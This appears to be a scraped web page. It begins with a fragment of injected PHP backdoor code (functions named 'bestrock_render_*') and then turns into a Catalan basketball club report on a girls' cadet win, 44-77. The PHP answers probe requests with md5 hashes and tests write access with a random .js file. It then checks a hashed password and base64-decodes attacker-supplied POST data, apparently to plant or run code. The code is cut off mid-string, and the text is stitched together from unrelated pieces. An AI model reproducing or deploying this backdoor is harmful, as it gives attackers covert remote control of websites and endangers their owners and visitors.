function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Cadet femení 06 A augmenta la intensitat defensiva en el segon quart i derrota el Centre Catòlic l'Hospitalet (44-77) - Tgn Bàsquet Club -

El Cadet femení 06 A augmenta la intensitat defensiva en el segon quart i derrota el Centre Catòlic l’Hospitalet (44-77)

Updated: març 30, 2021

L’equip Cadet femení 06 A del TGN Bàsquet va vèncer per segona vegada en una setmana el Centre Catòlic l’Hospitalet. Si en el partit del Sagrat Cor el triomf va ser per 83-22, aquesta vegada, a la pista del rival, el marcador va mostrar un 44-77 favorable a les tarragonines. El matx va ser igualat durant el primer quart, quan les locals van aprofitar els tirs lliures i el rebot ofensiu per plantar cara a l’equip que entrena David Artero. A partir del segon període, l’augment de la intensitat defensiva de les tarragonines va sentenciar el matx. El parcial de 3-19 en el segon període va mostrar quina seria la dinàmica del partit i les diferències no van parar de créixer.